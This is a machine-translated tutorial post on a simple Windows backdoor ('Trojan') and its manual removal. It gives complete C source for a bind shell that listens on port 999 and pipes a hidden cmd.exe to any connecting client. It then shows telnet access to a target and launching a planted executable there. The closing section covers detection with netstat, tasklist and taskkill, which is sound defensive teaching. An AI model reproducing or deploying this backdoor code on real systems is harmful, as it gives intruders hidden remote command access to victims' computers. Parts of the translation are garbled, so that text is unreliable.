Anti-Virus Attack and Defense Research: simple Trojan Analysis and Prevention part1

Anti-Virus Attack and Defense Research: simple Trojan Analysis and Prevention part1
I. preface the development of virus and Trojan Horse technologies today, because they are always complementary, you have me and I have you, so the boundaries between them are often no longer so obvious, each other often uses some of the other's technologies to achieve their own goals, so now many times they are collectively referred to as "malicious code ". This time I plan to use two articles to discuss the analysis and prevention methods of the combination of viruses and simple Trojans. This article is the first article, discussing how to use a server-side Trojan program to start a virus. In the next article, I will discuss the Analysis and Prevention of the combination of trojans on both servers and clients and viruses.

Ii. Principle of simple Trojans because Trojan technology is closely related to computer networks, Socket programming is indispensable. I am not going to detail the details of Socket programming here. This is a very detailed description on MSDN. It is nothing more than filling in the corresponding content in the "template" according to the Socket programming process ". To achieve the communication effect, we need to follow a communication model. Trojans are generally in the C/S (Client/Server) mode. This article will discuss that, although it does not involve writing the client, I actually only regard the cmd program as the client, so it is basically in the C/S mode.
To develop the C/S model, you need to bind an IP address and a port number to the server (the computer you want to attack), then listen and wait for the connection from the client (the attacker. The client initiates a connection to the corresponding IP address and port number. After the Server accepts the connection, both parties can start to communicate. This is TCP-based communication and the method to be used later. In addition, there is also a UDP-based method, which means that after the server is bound, the client can directly communicate with the server without a connection. It can be seen that TCP is more reliable than UDP, while UDP is more efficient than TCP.
The basic principles of server-side programming described in this article are as follows:
1. Open a channel (bind a port) and notify the local host that it receives customer requests at a specific address. You can use the socket and bind functions.
2. Wait for user requests to reach this port. Use the listen function.
3. receive a service request, process the request, and send a response signal. Use the accept function.
4. Return step 2, waiting for requests from other customers.
5. Close the connection. Use the closesocket function.
The order of the functions used is as follows:
Socket () → bind () → listen () → accept () → closesocket ()

3. Trojan programming when the server runs this program, the client can use telnet to initiate a connection to the server. After the connection succeeds, the cmd window is automatically opened, you can use the DOS command to directly control the target computer on the server. The Code is as follows:

# Pragma comment (lib, "ws2_32.lib") # include <winsock2.h> # include <windows. h> # define MasterPort 999 // The port number int main () {WSADATA WSADa; sockaddr_in SockAddrIn; SOCKET CSocket, SSocket; int iAddrSize; PROCESS_INFORMATION ProcessInfo; STARTUPINFO StartupInfo; char sz1_path [255]; // initialize data ZeroMemory (& ProcessInfo, sizeof (PROCESS_INFORMATION); ZeroMemory (& StartupInfo, sizeof (STARTUPINFO); ZeroMemory (& WSADa, sizeof (WSADATA); // obtain the CMD path GetEnvironmentVariable ("COMSPEC", sz%path, sizeof (sz%path); // load ws2_32.dll WSAStartup (0x0202, & WSADa ); // set the local information and binding protocol to establish Socket SockAddrIn. sin_family = AF_INET; SockAddrIn. sin_addr.S_un.S_addr = INADDR_ANY; SockAddrIn. sin_port = htons (MasterPort); CSocket = WSASocket (AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 999); // set the binding port bind (CSocket, (sockaddr *) & SockAddrIn, sizeof (SockAddrIn); // sets the server listening port listen (CSocket, 1); iAddrSize = sizeof (SockAddrIn); // starts to connect to the remote server, and configure the hidden window struct SSocket = accept (CSocket, (sockaddr *) & SockAddrIn, & iAddrSize); StartupInfo. cb = sizeof (STARTUPINFO); StartupInfo. wShowWindow = SW_HIDE; StartupInfo. dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; StartupInfo. hStdInput = (HANDLE) SSocket; StartupInfo. hStdOutput = (HANDLE) SSocket; StartupInfo. hStdError = (HANDLE) SSocket; // create an anonymous pipeline CreateProcess (NULL, sz1_path, NULL, NULL, TRUE, 0, NULL, NULL, & StartupInfo, & ProcessInfo ); waitForSingleObject (ProcessInfo. hProcess, INFINITE); // closes the Process Handle CloseHandle (ProcessInfo. hProcess); CloseHandle (ProcessInfo. hThread); // close socket closesocket (CSocket); closesocket (SSocket); // release ws2_32.dll dynamic link library WSACleanup (); return 0 ;}

The code is relatively simple and will not be analyzed here.

Iv. Combination of Trojans and viruses

The self-starting method of "virus" discussed in the previous article requires the use of "External Force", and this time my "virus" is implanted with Trojans, after the connection is successful, enter the doscommand to start the trojan, provided that the trojan needs to be started first. Here I have used two computers (or virtual machines), one is the client, the other is the server, and the server has already placed a trojan program. Now I am running the Trojan on the server. Then open the cmd program in the client and enter:

[Plain] view plaincopy
Telnet to 192.168.1.107 999

This command is used to remotely log on through telnet and connect to port 999 on the computer whose IP address is 192.168.1.107. After successful connection, you can find that you have connected to the computer of the other Party:

Figure 1 connect to a remote computer

In this case, you can use the doscommand to control the target computer. In this case, the e-directory of the target computer is saved with the hacked.exe program compiled previously. You can run it by entering the following command:

[SQL] view plaincopy
Start e: \ hacked.exe

The hacked.exe program has been executed on the target computer and is displayed as follows:

Figure 2 start hacked.exe on the target computer

The hosts program is uploaded from the client to the server and then started. However, because this method is dangerous, we will not discuss it in depth in order to avoid people with ulterior motives from taking it as an unhealthy task. My principle is always to discuss how to better prevent malicious programs, and the implementation of malicious code, that is, the point to the end. We do not need to discuss it in depth.

5. trojan detection and removal

The above code implements a simple forward connection backdoor program without adding the process hiding function or adding a startup project. That is to say, when the server computer restarts, this trojan will become invalid and must be re-run. Here I will talk about how to manually scan and kill. After the server is implanted with a Trojan, the server can Enter cmd (if the cmd is hijacked by an image, refer to my previous article), and then enter the following command:

[Plain] view plaincopy
Netstat-ano

This command can view the current network connection status ,:

Figure 3 network connection status

As shown in the figure, the local port 999 establishes a TCP connection with the host whose IP address is 192.168.1.104, and the process ID value is 1292 (the PID value of each Trojan may be different ). For general Trojans, you can perform the "query" operation at the command prompt. As the discussion goes deeper, the complexity of Trojans will continue to increase, I may use professional killing tools or self-made tools to implement the "query" function.

You can use the PID value to view the process file name, and enter:

[Plain] view plaincopy
Tasklist | find "1292"

We can tell you that the pidvalue is "minitrojan.exe ". Then, the Trojan process can be deleted from the computer by using the PID value. Here, the taskkill command is used:

[Plain] view plaincopy
Taskkill/f/pid 1292/t

This Command Forces (/f) to terminate a process with a PID of 1292 and any process (/t) started from this ). The last step is to find the location of minitrojan.exe and delete it so that the Trojan can be completely evicted from the computer.

 

Vi. Summary

The trojan program mentioned in this Article needs to run in cmd. Although the remote interface is intuitive, this small Trojan can also pose a great threat. However, this is a "Pony" after all, and it can be detected and killed by using a simple DOS command. It is still a good solution. In fact, the process of manually scanning and killing viruses and Trojans is like this. It often requires experience and a keen sense of smell. In the subsequent "Killing" phase, the process of virus and Trojan Horses should be terminated first, then, the main program can be deleted. This principle basically applies to even complex malicious programs.